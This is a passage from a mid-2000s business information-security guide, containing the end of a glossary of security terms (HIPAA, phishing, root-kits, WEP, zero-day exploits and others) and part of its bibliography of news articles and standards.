hardware firewall is built into a router or other device. A software
firewall is a second line of defense running directly on the server or PC
it protects, only allowing traffic to or from certain applications (e.g. a
web browser). A firewall may provide for a DMZ to provide limited
protection for Internet services such as an online store.
HIPAA The Health Information Portability and Accountability Act is a US

Federal Law [Usc-1996] which, for our purposes, places requirements
on the use, disclosure, retention, and protection of private health
records. In particular, the Security Rule (issued in 2003) lays out
three types of safeguards required for compliance, the Administrative
Safeguards (defined policies, management, and auditing), the Physical
Safeguards (restricting access to records and equipment), and
the Technical Safeguards (technological protections for networks,
computers, and communications) [Dhhs-2003]. Businesses may be
required to comply with HIPAA if they manage private health
information (obviously including medical organizations, but can also
include components of organizations managing information related to
employee health plans) or subcontractors of such businesses.
For the most part, the HIPAA Security Rule avoids making specific
technology requirements (which would quickly become obsolete)
by stating what must be accomplished, rather than how it must be
accomplished such as requiring that networks must be protected
from intrusion and that documents must be able to be verified to
prevent tampering. The organization must further document their
actual practices and self-audit on a regular basis.
54
A number of related documents are available from the US Health and

Human Services Web Site25.
image A drive image or image is a complete copy of a hard drive or a

partition on a hard drive, including the raw filesystem, all files, free
space, and deleted files. Images are used in backup and recovery to
quickly restore a hard drive from a backup. It is common, for instance,
for a system administrator to have an image of a new system with
Windows and standard applications rather than installing each system
individually. Images are also used in computer forensics to allow
security personnel or law enforcement to examine a stored copy of a
hard drive and all of its contents.
Intranet An internal network, such as a business or home. Intranets are

connected to other networks, such as the Internet, by a router.
ISF Standard of Good Practice The Information Security Forum26 Standard of Good Practice for
Information Security [Isf-2005a] is a standard of information security
best practices published by an international consortium. Although
they use the term “information security” to describe the document,
they are more focused on digital data than ISO/IEC 17799:2005. Like
other security standards, they avoid committing to specific technical
recommendations, concentrating more on policy and practice. They
do, however, do a good job of keeping up with changing security
issues, such as instant messaging and recent virus threats in the current
(4.1) version. This document also does an excellent job of not getting
bogged down in jargon (either its own or computer/technical).
The ISF standard overlaps with and is complementary to aspects of

both COBIT® and ISO/IEC 17799:2005.
ISO/IEC 17799:2005 An international business process standard for best practices in

information security. Note that this is a broader term than “data”
security and includes information in any form, such as paper
and security of physical storage. The standard provides guidance
on risk management processes, policy development, management
and approval structures, access controls and classification levels,
monitoring and auditing. Like most such standards, it concentrates
more on what to manage than precisely how and avoids specifying
specific controls or technologies [IsoIec-2005]
This standard overlaps with and is complementary to aspects of both

COBIT® and the ISF Standard of Good Practice. ISO/IEC 17799
was first published in 2000 as an international standardization of the
British Standard (BS) 7799-1:1999, and will be renamed to ISO/IEC
27002 in 2007.
key escrow key escrow can be used to mean any of several different technologies.
As used in this paper, it means a process where multiple passwords
are used to access the same document or data. Each password works
individually, so you can set up an employee password and a master
password, for instance, so that sensitive data can be accessed even
if the employee is not available (or no longer works for you). In a
sense, key escrow trades one issue for another, in that it creates a single
master password which can fall into the wrong hands. The master
55
passwords should be used very seldom, so that they are not likely to
be captured, and different passwords should be used for different sets
of data to minimize damage if a password leaks (or is misused).
key logger A program which tracks the use of a computer, recording typing,
web sites visited, and especially, capturing usernames and passwords.
Keyloggers either record the data locally and must be retrieved
periodically (has been common in Internet cafes and copy centers)
or will automatically send their information to their controller. Key
loggers may be installed by malware or directly by someone with
access to the computer, including, in some cases, by employers to
track employee use of a computer.
malware A general term for software that violates privacy, breaches security,
and damages computers, including viruses, spyware, and trojan
horses. The distinction between these types is blurring because one
type of malware will often enable and spread other kinds.
man-in-the-middle The attacker performs as an intermediary between two parties without

their being aware of it; the attacker can copy and modify secure
communications at will.
Alice and Bob are trying to communicate securely. Malory poses

as Bob and she gives Mallory the password they will use. Mallory
makes up a new password to give to Bob. Mallory now takes all coded
messages from Alice, reads them, reencodes them, and sends them on
to Bob, doing the same going in the reverse direction. Mallory can
also modify the messages at any time without anyone the wiser.
In phishing schemes, the attacker poses as a banking site, tricks the

user into logging into the fake site, and passes the name and password
on to the real bank, sending the user the bank's responses. The attacker
can now monitor and modify any of the user's banking activities. To
the user, everything looks normal. Network services have a number
of ways to reduce the chance of a man-in-the-middle attack, but many
of them involve authenticating the two ends of the conversation in
some way, and user vigilence is essential. Making sure that the URL
and SSL certificate are correct for a secure website, noting suspicious
communications, calling a colleague to verify that an encryption key
belongs to them (by verifying its fingerprint, a unique identifying
number), and so forth, will quickly derail attackers.
open The Carnegie Mellon Software Engineering Institute's Open Systems

glossary defines “open” as follows:
The specification of a component is open if (1) its

interface specification is fully defined and available
to the public, and (2) this specification is maintained
by a group consensus process.
—[SeiCm-2007]
An “open system” is a system made up of components which are well-

specified and, at least theoretically, interchangable.
Most disagreements in the definition of “open” center on the definition

of “publicly available”. Open does not necessarily imply “free”. For
56
instance, source code to a system may be “open” to and controlled by

the consensus of a very select group or implementation of an “open”
standard may require licensing of patents or other legal issues (e.g.
GIF, MP3, AAC). The word is often used as a marketting ploy and
should be treated with a degree of skepticism. See further discussion
under standard and open source.
open source Open source is a system and a movement of distributed software

development where full source code for systems is publicly available
and effort is advanced by the donations of many individuals and
organizations. In many ways, this is actually not a new system,
but closely mirrors the way much of the Internet infrastructure
was developed in the university systems and scattered corporate
laboratories. Contrary to popular conception, many contributors to
open source are not hackers in garages, but rather professionals
who are funded by their organizations to work on public projects.
Among the benefits to the organization are that individual efforts are
multiplied, products are peer reviewed, and the organization is not
solely responsible for future maintenance. If support is needed, it can
be purchased from multiple competing sources or provided in house.
A large pool of open source code acts as a ready base for customized
software.
Open source is not to be confused with “public domain”, which is non-

copyrighted. Open source is copyrighted, but under a license which
provides for modification and redistribution, generally under “share-
alike” terms which mean that you must license changes under the
same terms you received them— giving back to the common pool.
(Open source products may be freely used alongside commercial and
proprietary works.)
There are a number of nearly open source “shared source” or

“community source” licenses which are more restrictive and may
result in a contributor losing access to their own work or coming under
other surprising restrictions. The Open Source Initiative maintains a
definition of what constitutes an open source license and approves
individual licenses for use in the community [Osi-2006]. The most
well-known open source license is the General Public License, or
GPL, which is currently being revised into its 3rd version with broad
industry input. The main goals include improving protection against
patent-litigation, a growing concern with software of all kinds.
Because of the many-eyes approach, open source can be more secure

than closed-source software. It is also much more difficult to sneak
backdoors into a peer-reviewed and heavily change-controled process.
However, there are always good and bad products, and, since open
source projects ae visible from the moment of inception, there are
many projects which are not ready for public use by any but the most
adventurous. High-profile and long-term open source projects like
Linux and the Apache web server rival any other product for quality
and will often receive large donations of funding, equipment, or
functionality from diverse sources. As a noted example, the SELinux
Role-Based Security module now included in most Linux systems was
developed and donated by the National Security Agency.
57
Payment Card Industry Data A data security standard for merchants who handle credit card data
Security Standard maintained by the PCI Security Standards Council. The individual
card service providers (e.g. Visa, Mastercard) determine which
entities must comply and enforce compliance. The standard defines
requirements for providing a secure network, creating document
retention policies, restricting access to data, and so forth. The PCI
DSS takes an “as little as possible for as short a time as possible”
approach to storing private customer data. See the PCI DSS FAQ
online [PciSsc-2007] or the standard itself [PciSsc-2006].
phishing A scheme whereby a forged email is sent purporting to be from a

business you have a relationship with (a bank or vendor, for instance)
with the intent of taking you to a fake internet site and getting you
to provide personal information which is then used to steal money or
goods. A typical scheme involves telling the recipient that something
is wrong with their account and that they need to verify sensitive
account information. Phishing is currently one of the most lucrative
Internet crimes.
pretexting The practice of impersonating a person or entity in order to obtain

more information about them, such as impersonating a phone
customer to get copies of phone records or impersonating a boss to
get a password changed. Among hackers and security professionals,
this is also known as human engineering.
Public Key Cryptography A system of encryption where everyone has a public key and a private
key (each is a file). The public key is used to encrypt a document,
while the private key is used to read it. The public key is published
freely, but the private key must be hidden (and generally requires
a password to be used). The wonderful thing about this system is
that you do not need to worry about how to get a secret password to
someone. After all, if you could get a password to someone secretly
and safely, why not send the whole document that way? In this case,
yo can just send someone your public key without worrying about
anyone intercepting it. Public Key Cryptography is especially useful
in secure email systems.
Public Key Cryptography can also be used for digital signing, also
called non-repudiation. A person uses their secret key to sign a
document and anyone else can use that person's public key to verify
the signature. The signature proves that the document was signed and
has not been changed. Digital signatures can be used to run digital
notary services which can prove that a particular document existed at
a specific time and has not been altered by anyone else.
root-kit A set of programs installed on a computer to let someone take full

control of it and hide their presence. Often delivered by a trojan horse
or similar.
router A device which routes traffic between two networks. You can think
of a router as a highway interchange or on-ramp. A router will often
function as a firewall.
secret Private, uniquely identifying information or objects used to gain entry

or access information. In security or cryptographic terms, a secret
58
can include a physical key, the combination to a lock, a password,

an encryption key, an access card or other device. Often, identifying
information such as a social security number or mother's maiden name
are treated as secrets by businesses, but they are inherently insecure
since you must give out the same information many times in order to
do business.
security by obscurity Keeping elements of a security plan secret in order to increase security
and prevent attackers from finding flaws, such as the design of
encryption algorithms or the source code of a program or operating
system. Often, the secrecy acts as no more than a speed bump to an
attacker and the benefit of standard, peer-reviewed and proven defense
far outweighs the temporary advantage. Criminals have many ways of
finding flaws in secret systems, including stealing source code from
vendors, and there are many of them looking. The design of a security
system should assume that the attackers know all secrets with the
exception of the actual keys or passwords. Security by obscurity can
add to an otherwise secure system, such as by hiding from the attacker
which standard defense is being used in order to slow down automated
tools.
silver bullet A high-tech, whiz-bang solution to everything in one box. Many

vendors like to tell you that their product and their product alone will
fix all of your problems. In most cases, they produce a single point of
failure where one mistake nullifies all of your security. As an example,
if you have an expensive product to keep Internet hackers out, what
happens when the attacker gets physical access to your PC? or hijacks
the dialup account of your employee? or steals your salesperson's
laptop? or is an employee? It is often better to have a defense in depth
where multiple simpler defenses interlock to protect the whole.
sneakernet Transferring documents by disk (floppy, CD, USB drive, etc.) and
foot-power (sneakers). Often used by employees to avoid technical
problems or security restrictions, it can also be used to increase
security by avoiding sending sensitive documents over the Internet.
SPAM A term for bulk unsolicited email, usually commercial, and can be
compared to physical junkmail. Unlike postal junkmail, however,
email recipients and operators of mail servers pay the postage, making
it possible for SPAMers to send millions of messages at little or no
cost. Also unlike postal junkmail, a large percentage of SPAM content
is illegal. The term comes from a 1975 Monty Python skit27 as related
to something which is repeated endlessly and cannot be gotten rid of.
Hormel Foods has tried unsuccessfully in court to block the use of

the term SPAM since they hold the trademark in their canned meat
product.
spyware Software that covertly monitors the user's actions, particularly

websurfing habits, mainly for marketting purposes. Spyware is
usually contained in and installed as part of irreputable freeware or
shareware software that can be downloaded. The primary difference
between spyware and a trojan horse is that the intent of spyware is
commercial, not to commit criminal acts or damage the computer
per se. The line becomes blurred because poorly written spyware
59
often does damage or becomes a means of infection by accident. Like

viruses or trojan horses, spyware will often take steps to make its
removal difficult.
standard When used without an article, as in “standard practice” or “standard

technology”, I am referring to common or customary use, which
may include de-facto standards. Otherwise, “a standard” is a
published specification for a technology, product, or practice. In
order to be effective, a standard must provide some means for
measuring conformance, whether a particular implementation meets
the standard, such as a measure of effectiveness for a security standard
or of interoperability for a product standard. In general, standards
bodies accept specifications only for existing products or practices
(providing proof of viability), and specifications will often begin in
a trade consortium and wend their way up through national and then
international standards bodies as they gain adoption. An open standard
is one where the specification is publicly available, maintained by
group consensus, and available for any interested party to implement.
Patents and other legal restraints can be significant barriers to open

standards. In the past, companies have pushed for their specifications
to be adopted by the industry only to turn around and threaten law suits
for patent infringement after it acheives widespread use (e.g. GIF,
MP3). Standards organizations have begun to adopt rules requiring
participants to grant patent rights to the standards body and standards
implementors. Often, these rights are under “Reasonable and Non-
Discriminatory” (RAND) policies, which seek to prevent the holder
from using patents for trade-restraint and enforce broad-licensing.
Despite this, RAND compatible-policies can still cause problems
for broad standards adoption, typically preventing adoption by open
source systems (due to license incompatibility) and often harboring
dangerous fine print. Any RAND-patent licenses or covenants-not-to-
sue should be examined by an attorney to ensure that they provide
adequate protection. A better solution is to stick to standards which
require full and open patent licensing terms.
Standards encourage choice in the marketplace by ensuring that

consumers can purchase interchangable products, are assured a level
of quality, and can avoid vendor lock-in. Choice among standards
(having multiple standards which do the same thing) is often bad,
causes marketplace confusion, and can encourage vendor lock-in.
trojan horse Historically, the Trojan Horse was a large wooden statue that
Odysseus tricked the Trojan army into taking inside their city. At
night, Achaen soldiers came out of the horse and ended a ten year
siege in several bloody hours. In computer terms, a trojan horse is a
program or file which you are tricked into downloading thinking it
is something else, such as a card game or a video file. When used,
the trojan horse invades your computer and leaves the gates open for
a follow-on attack. A trojan horse differs from a virus in that it has
no means to spread, although it may download other tools once it is
installed.
virtual machine A simulated computer running inside a real computer. A virtual

machine (VM) appears to have its own hard drive, operating system,
60
and applications, but they actually exist as files on the real computer
running them (the host). For instance, it is possible for a Windows
Vista host computer to run two virtual machines each with Windows
XP and a web server.
The appeal of virtual machines is that they can be created and

destroyed quickly and easily when needed, that they can be moved
from server to server, and that they allow services to be separated for
greater security and reliability. Instead of one server with a database
and a webserver, you can run two VMs, one with a web server and the
other with the database. Failure of one VM will not cause the other to
fail and an attacker who gains control of one cannot necessarily access
the other machine or the host. A problem with a virtual machine can
sometimes be fixed by destroying and recreating it from a backup,
which is a simple process.
The downside of virtual machines is that they are slower than

real computers and use more disk space, so total hardware is
more expensive. You must also typically pay for a software
license (operating system and applications) for each virtual machine
rather than each computer. Some operating systems have licenses
prohibiting them from being used in virtual machines (e.g. Mac OS
X, some versions of Windows Vista), while others (Linux, FreeBSD)
can be used at no additional cost.
Virtual Private Network An encrypted connection over the Internet between two networks,
often used for telecommuters to connect to their corporate office.
A VPN is usually started on a user's home PC or firewall device
and connects to a business firewall on the other end. The connection
creates a kind of “tunnel” between the two networks, acting like the
user's home PC is connected directly to the business, while at the same
time, preventing someone from eavesdropping on the traffic. VPNs
can be convenient and quite effective, but must be used with caution;
a home user with a usecured wireless access point can accidentally
give their entire neighborhood direct access to your business network
via a VPN connection.
virus A biological virus invades a cell and turns it into a mini virus factory.
The copies of the virus then go to invade other cells. Computer viruses
attach to computer programs in order to copy themselves. Modern
computer viruses can also infect office documents like memos and
spreadsheets and spread via email because common office programs
(e.g. MS Office) contain macros which act like mini programs.
Viruses cannot infect pure text, plain email, or documents without
scripts or macros. Viruses spread by email will typically read the
recipient's address book and mail copies of itself to other people.
Virus scanners detect viruses by looking for specific patterns

(fingerprints or signatures) in the infected program. For this reason,
virus scanners can only detect viruses which have already been
discovered or that are very similar to known viruses. New viruses will
not be detected until an update is available from the vendor.
Modern viruses modify the PC they infect to hide themselves and

prevent removal, even from virus scanning software. For this reason,
61
it is often neccessary to reinstall the operating system to completely

remove a virus once it infects your system.
vulnerability A weakness in a security design or procedures which could potentially

be exploited, on purpose or by accident. A vulnerability can exist for
some time without a known way of effectively exploiting it, or an
exploit may be discovered at the same time. See exploit and zero-day
exploit.
WEP Wired Equivalent Protection, a standard for encrypting first-

generation wireless networks (802.11b), it was intended to make
wireless networking as secure as wired networking. It did no
such thing, for the simple reason that wireless networks can be
tapped from a considerable distance and wired networks cannot.
Today, WEP encryption has been cracked and is essentially
useless [TewsEtAl-2007], and users should either upgrade to newer
equipment using WPA or WPA2 encryption, or structure their
network so that wireless networks are not trusted (see the section
called “Disappearing Boundaries”).
wireless networking connecting computers and peripherals with radio-based networks.

Wireless networking usually refers to the technology commonly
called Airport™ (an Apple trademark) or WiFi™ and technically the
802.11x standards. Recently, people have also begun using wireless
network to refer to cellphone networks and cellphone-based Internet.
There are several different standards of WiFi which operate at

different speeds and radio frequencies. This is confusing to many
consumers. A brief comparison is provided on webopedia28. For
our purposes, it is important to note that 802.11b, one of the older
standards which is still in common use, uses security (WEP) which
is now effectively useless against attackers with standard tools
[TewsEtAl-2007].
Wireless networks avoid costly wiring and are very convenient,

especially for small businesses leasing space, and especially for
travellers with laptop computers. However, there are a number of
security issues with wireless networks, including readily available
tools for breaking into and snooping on them. When using your
laptop in a public place, it is possible to have your laptop hijacked if
you accidently leave wireless on (vendors have acted to reduce this
problem). Using public wireless networks may allow others to record
your Internet traffic, including email and web pages visited; using SSL
to access web pages and email makes this much more difficult.
workflow A workflow is the sequence of steps that a particular document goes

through in the course of a business process, from start to completion.
For example, a press release may go through one or more stages
of drafting and review, require final approval, get published, then
archived. In workflow automation, roles are defined, such as owner,
editor, reviewer, and approver, individuals are assigned to roles, and
the roles are given appropriate access rights to the document as it
passes from one stage to the next. Members of a workflow team are
often given the ability to assign roles to other individuals; for instance,
62
a document's owner may assign reviewers. Contrast this to ACLs,

where access rights are typically centrally managed.
WPA WPA and WPA2 are encryption standards for newer wireless
networking protocols. They replace the insecure WEP encryption used
in first-generation wireless networks and are still considered safe.
Wireless networks, however, are fundamentally less secure than wired
networks, so it is always a good idea to structure your network so that
wireless networks are not trusted (see the section called “Disappearing
Boundaries”)
WPA2 See WPA.
zero-day exploit A vulnerability and an effective exploit discovered at the same time.
Zero-day exploits in 3rd party software are extremely dangerous
since it will take time for vendors to produce an update fixing the
vulnerability and, in the meantime, attackers may freely use the
exploit. Often, the only effective solution is to close or reduce services
in some manner to deny access to the vulnerability while security
experts attempt to fix the problem. For example, users can temporarily
turn off javascript in their web browsers to avoid an exploit which
uses javascript.
zombie A computer infected by malware which is under remote control. A

zombie will be made to perform illegal tasks for its controller, such
as sending SPAM, breaking into other computers, Distributed Denial-
of-Service (DDoS) attacks, and so forth. A zombie also generally
includes a key logger as well.
Bibliography
[AliPabrai-2005] Certification Magazine29. MediaTec Publishing, Inc. “The CobiT Security Baseline30”. Uday O. Ali
Pabrai. July 2005.
[Bbc-2007a] BBC News31. BBC. “Malicious code rise driven by web32”. The number of new pieces of malicious
software has doubled in the last year with the web being used increasingly to distribute the code, a report
says. March 19, 2007.
[Bbc-2007b] BBC News33. BBC. “'Surge' in hijacked PC networks34”. April 25, 2007.
[BrownleeGuttman-1998] N. Brownlee and E. Guttman. “Request for Comments: 2350 - Expectations for Computer
Security Incident Response35”. Internet Engineering Task Force. June 1998. RFC: 2350.
[CaSenate-2003] California State Senate. “California Information Practice Act of 2003”. SB 1386. September 26,
2002. This bill became law in 2003. The text of the law is available online36.
29
http://www.certmag.com
30
http://www.certmag.com/articles/templates/cmag_department_sec.asp?articleid=1239&zoneid=43#
31
http://news.bbc.co.uk/
32
http://news.bbc.co.uk/2/hi/technology/6465833.stm
33
34
http://news.bbc.co.uk/2/hi/technology/6591183.stm
35
http://www.ietf.org/rfc/rfc2350.txt
36
http://info.sen.ca.gov/pub/01-02/bill/sen/sb_1351-1400/sb_1386_bill_20020926_chaptered.html
63
[Dhhs-2003] The Federal Register. National Archives and Records Administration. 45 CFR Parts 160, 162, and 164
Health Insurance Reform: Security Standards; Final Rule37. February 20, 2003. 68. 34.
[Evett-2007] Top Ten Reviews. TopTenReviews, Inc. Don Evett. “Spam Statistics 200638”. January 18, 2007.
[FbiIc3-2006] Internet Crime Complaint Center 2006 Internet Fraud Crime Report39. January 1, 2006 - December 31,
2006. National White Collar Crime Center. Federal Bureau of Investigation. FBI Internet Crime Complaint
Center. Washington D.C.. 2007.
[FeynmanEtAl-1985] Richard Phillips Feynman, Ralph Leighton, and Edward Hutchings. Edward Hutchings. Surely
you're joking, Mr. Feynman!. adventures of a curious character / Richard P. Feynman as told to Ralph
Leighton. W.W. Norton. New York. 1985. 0393019217.
[GarfinkleMalan-2006] “One Big File Is Not Enough: A Critical Evaluation of the Dominant Free-Space Sanitization
Technique”. Simson L. Garfinkle and David J. Malan. 2006. A copy of this paper is available from the authors,
or on the web40.
[GordonEtAl-2006] 2006 CSI/FBI Computer Crime and Security Survey. Lawrence A. Gordon, Martin P. Loeb,
William Lucyshyn, and Robert Richardson. Federal Bureau of Investigation. Computer Security Institute.
Copyright © 2006 Computer Security Institute. 2005. The report can be obtained online by following links
from http://www.gocsi.com/press/20060712.jhtml and registering..
[Harbert-2006] IQ Magazine41. Cisco Systems, Inc.. Tom Harbert. Mick Wiggins. “Combining Security and
Regulatory Compliance42”. Using best practices for network security sets a course to time savings, asset
protection, and sales to big customers. 3rd Quarter 2006.
[Higgins-2007] Dark Reading43. Light Reading, Inc.. New York, NY. Kelly Jackson Higgins. “How to Cheat Hardware
Memory Access44”. February 27, 2007.
[Isf-2005a] Information Security Forum. The Standard of Good Practice for Information Security. 4.1. Copyright
© 2005 Information Security Forum. January, 2005. The standard can be obtained online from http://
www.isfsecuritystandard.com/index_ie.htm. Registration is required. As of the time of this writing, their site
will not function if javascript is not enabled.
[Isf-2005b] Information Security Forum. ISF Digest: The Disappearance of the Network Boundary. Copyright
© 2005 Information Security Forum. April, 2005. The report can be obtained online from http://
www.securityforum.org/html/view_pub01.asp. Registration is required. As of the time of this writing, their
site will not function if javascript is not enabled.
[IsoIec-2005] ISO. Information Technology - Security Techniques. Code of practice for information security
management. 2005. ISO. Geneva Switzerland. ISO/IEC 17799. 2005. Copies can be obtained from the ISO
Online Store45.
[Itgi-2004] IT Governance Institute. COBIT® Security Baseline. An Information Security Survival Kit. IT Governance
Institute. Rolling Meadows, Illinois. 2004. 1-893209-79-2. Note that a PDF is available online46 with site
registration. The download PDF has several pages of ads and membership material at the front— it is the
correct document.
37
http://www.cms.hhs.gov/SecurityStandard/Downloads/securityfinalrule.pdf
38
http://spam-filter-review.toptenreviews.com/spam-statistics.html
39
http://www.ic3.gov/media/annualreport/2006_IC3Report.pdf
40
http://www.simson.net/clips/academic/2006.PET.bigfile.pdf
41
http://www.cisco.com/web/about/ac123/iqmagazine/index.html
42
http://www.cisco.com/web/about/ac123/iqmagazine/archives/q3_2006/COMP_sailingcompliance.html
43
http://www.darkreading.com/default.asp
44
http://www.darkreading.com/document.asp?doc_id=118291
45
http://www.iso.org/iso/en/CatalogueDetailPage.CatalogueDetail?CSNUMBER=39612&ICS1=35&ICS2=40&ICS3=
46
http://www.isaca.org/TemplateRedirect.cfm?template=/ContentManagement/ContentDisplay.cfm&ContentID=20290
64
[Itgi-2005] IT Governance Institute. COBIT® 4.0. Control Objectives Management Guidelines Maturity Models. IT
Governance Institute. Rolling Meadows,Illinois. 2005. 1-933284-37-4. Note that a PDF is available online47
with site registration.
[Itgi-2006] Cobit® Focus48. IT Governance Institute. Rolling Meadows,Illinois. IT Governance Institute. “Harley-
Davidson: Using COBIT to Simplify Compliance”. pp 8-9. December 2006. 2. Copyright © 2006 IT
Governance Institute. This issue available in PDF form online49. Note that the table of contents is wrong,
the article begins on page 8.
[Kantor-2005] USA Today50. USA Today. Andrew Kantor. “Sony: The rootkit of all evil?51”. November 17, 2005
5:00 PM. Copyright © 2005 USA Today.
[Keizer-2007] ComputerWorld52. ComputerWorld, Inc.. George Keizer. “Massive spam shot of 'Storm Trojan' reaches
record proportions53”. It's the biggest spam blast in the last year. April 12, 2007. Copyright © 2007
ComputerWorld, Inc..
[Krazit-2006] ZDNet News54. CNet Networks, Inc.. Tom Krazit. “FAQ: The HP 'pretexting' scandal55”. September 6,
2006, 4:42 PM PT. Copyright © 2006 CNet Networks, Inc..
[Krebs-2007] Security Fix56. The Washington Post Company. Brian Krebs. “Fortune 500s Unwittingly Become
Spammers57”. March 29, 2007; 11:11 AM ET. Copyright © 2007 The Washington Post Company.
[Lazarus-2006] The San Francisco Chronicle58. Hearst Communications, Inc.. David Lazarus. “Data theft may hurt
workers59”. August 16, 2006. Copyright © 2006 Hearst Communications, Inc.. This article appeared on page
C - 1 of the San Francisco Chronicle.
[Lemos-2007a] SecurityFocus™60. SecurityFocus™. Robert Lemos. “Consumers dump breached retailers, says
study61”. April 11, 2007. Copyright © 2007 SecurityFocus.
[Lemos-2007b] SecurityFocus™62. SecurityFocus™. Robert Lemos. “Report: TJX thieves exploited wireless
insecurities63”. May 4, 2007. Copyright © 2007 SecurityFocus.
[LioyEtAl-1997] Antonio Lioy, Fabio Maino, and Marco Mezzalama. “Secure Document Management and
Distribution in an Open Network Environment”. Polytecnico di Torino, Dip. di Automatica e Informatica.
Torino, Italy. 1997.
[MatsumotoEtAl-2002] Proceedings of SPIE Vol. #4677, Optical Security and Counterfeit Deterrence Techniques
IV. T. Matsumoto, H. Matsumoto, K. Yamada, and S. Hoshino. “Impact of Artificial Gummy Fingers on
Fingerprint Systems”. Copies of this paper can be obtained from the author by email64 or online from
47
http://www.isaca.org/cobit.htm
48
http://www.isaca.org/Template.cfm?Section=Home&CONTENTID=31703&TEMPLATE=/ContentManagement/ContentDisplay.cfm
49
http://www.isaca.org/Template.cfm?Section=Home&Template=/ContentManagement/ContentDisplay.cfm&ContentID=28423
50
http://www.usatoday.com
51
http://www.usatoday.com/tech/columnist/andrewkantor/2005-11-17-sony-rootkit_x.htm
52
http://www.computerworld.com
53
http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9016420
54
http://news.zdnet.com/
55
http://news.zdnet.com/2100-9595_22-6113011.html
56
http://blog.washingtonpost.com/securityfix/
57
http://blog.washingtonpost.com/securityfix/2007/03/fortune_500s_unwittingly_becom.html
58
http://www.sfgate.com/
59
http://www.sfgate.com/cgi-bin/article.cgi?f=/c/a/2006/08/16/BUG1EKJ14T1.DTL
60
http://www.securityfocus.com
61
http://www.securityfocus.com/brief/481
62
63
http://www.securityfocus.com/brief/496
64
mailto:tsutomu@mlab.jks.ynu.ac.jp
65
Cryptome.org65. There is also a summary of the findings in the May 15th, 2002 Crypto-Gram Newsletter66
from Counterpane Internet Security, Inc.
[Maxcer-2007] TechNewsWorld™67. ECT News Network™. Chris Maxcer. “Fail-Safe System Fails in Alaska's Data
Debacle68”. March 21, 2007 2:30 AM PT. Copyright © 2007 ECT News Network, Inc..
[MythBusters-2006] MythBusters. Beyond International. Crimes and Myth-Demeanors 2. August 23, 2006. 4. 59. An
online summary of this episode is available in the Online Wikipedia69.
[Osi-2006] Open Source Initiative70. Open Source Initiative. Open Source Initiative. Open Source Definition71. July
7, 2006 3:49. Copyright © 2006 Open Source Initiative. There is also an annotated version72 with some
additional rationale.
[PciSsc-2006] Payment Card Industry Data Security Standard73. 1.1. PCI Security Standards Council, LLC. PCI
Security Standards Council, LLC. Wakefield, Ma . September 2006.
[PciSsc-2007] PCI Security Standards Council™74. PCI Security Standards Council, LLC. The PCI Security Standards
Council Frequently Asked Questions - General Information75. PCI Security Standards Council, LLC. PCI
Security Standards Council, LLC. Wakefield, Massachusettes . April 17, 2007. Copyright © 2007 PCI
Security Standards Council, LLC.
[Rasch-2007] SecurityFocus™76. SecurityFocus™. Mark Rasch. “The Politics of E-Mail77”. April 17 2007. Copyright
© 2007 SecurityFocus.
[Schneier-2005] Wired78. CondéNet, Inc. Bruce Schneir. “Real Story of the Rogue Rootkit79”. November 17 2005
2:00 AM. Copyright © 2005 CondéNet, Inc.
[Schneier-2007] Wired80. CondéNet, Inc. Bruce Schneir. “How Security Companies Sucker Us With Lemons81”. April
19, 2007 2:00 AM. Copyright © 2007 CondéNet, Inc.
[SeiCm-2001] CERT Coordination Center82. Carnegie Mellon Software Engineering Institute. Pittsburgh, PA
15213-3890. Software Engineering Institute Carnegie Mellon. CERT® Coordination Center Incident
Reporting Guidelines83. Jul 30, 2001. Copyright © 2001 Carnegie Mellon University.
[SeiCm-2007] Software Engineering Institute - Carnegie Mellon84. Carnegie Mellon Software Engineering Institute.
Pittsburgh, PA 15213-3890. Software Engineering Institute Carnegie Mellon. Open Systems Glossary85.
March 20, 2007 8:38:06. Copyright © 2007 Carnegie Mellon University.
65
http://cryptome.org/gummy.htm
66
http://www.schneier.com/crypto-gram-0205.html#5
67
http://www.technewsworld.com
68
http://www.technewsworld.com/story/56414.html
69
http://en.wikipedia.org/w/index.php?title=MythBusters_%28season_4%29&oldid=127130877
70
http://opensource.org
71
http://opensource.org/docs/osd
72
http://opensource.org/docs/definition.php
73
https://www.pcisecuritystandards.org/pdfs/pci_dss_v1-1.pdf
74
https://www.pcisecuritystandards.org
75
https://www.pcisecuritystandards.org/about/faqs.htm
76
77
http://www.securityfocus.com/columnists/440/1
78
http://www.wired.com
79
http://www.wired.com/politics/security/commentary/securitymatters/2005/11/69601
80
http://www.wired.com
81
http://www.wired.com/politics/security/commentary/securitymatters/2007/04/securitymatters_0419
82
http://www.cert.org
83
http://www.cert.org/tech_tips/incident_reporting.html
84
http://www.sei.cmu.edu/opensystems/welcome.html
85
http://www.sei.cmu.edu/opensystems/glossary.html#o
66
[SoleckiRosenberg-2004] Law Journal Newsletters - Employment Law Strategist. ALM Properties, Inc.. Albert J.
Solecki, Jr. and Melissa G. Rosenberg. “Workplace E-mail86”. Employers Beware!. 12. 7. November 2004.
Copyright © 2004 ALM Properties, Inc..
[Sullivan-2006] The Red Tape Chronicles87. MSNBC. Bob Sullivan. “'I just bought your hard drive'88”. June 5, 2006
3:00 am CT. Copyright © 2006 MSNBC.com.
[TewsEtAl-2007] Erik Tews, Ralph-Philipp Weinmann, and Andrei Pyshkin. “Breaking 104 bit WEP in less than
60 seconds89”. Technische Universität Darmstadt, Fachbereich Informatik. Hochschulstrasse 10 Darmstadt
D-64289. April 3, 2007.
[Tweakers-2007] Tweakers.net90. Tweakers.net. Tweakers.net. “Secustick gives false sense of security91”. April 12,
2007 08:59. Copyright © 2007 Tweakers.net. This article is translated from the Dutch.
[Usc-1996] HEALTH INSURANCE PORTABILITY AND ACCOUNTABILITY ACT OF 1996. 104,191 USC. 1996.
The text of the law is available online92.
[Vijayan-2007a] ComputerWorld93. ComputerWorld, Inc. Jaikumar Vijayan. “TJX data breach: At 45.6M card
numbers, it's the biggest ever94”. It eclipses the compromise in June 2005 at CardSystems Solutions. March
29, 2007. Copyright © 2007 ComputerWorld, Inc.
[Vijayan-2007b] ComputerWorld (Australia)95. IDG Communications, Inc. Jaikumar Vijayan. “Hackers offer
subscription, support for their malware96”. Organised hacking gangs set up malware subscription sites. April
5, 2007 08:17:16. Copyright © 2007 IDG Communications, Inc.
[Weber-2007] BBC News97. BBC. Tim Weber. “Criminals 'may overwhelm the web'98”. 25 January 2007.
[West-BrownEtAl-2003] Moira J. West-Brown, Don Stikvoort, Klaus-Peter Kossakowski, Georgia Kilcrece, Robin
Ruefle, and Mark Zajicek. Handbook for Computer Security Incident Response Teams (CSIRTs)99. 2.
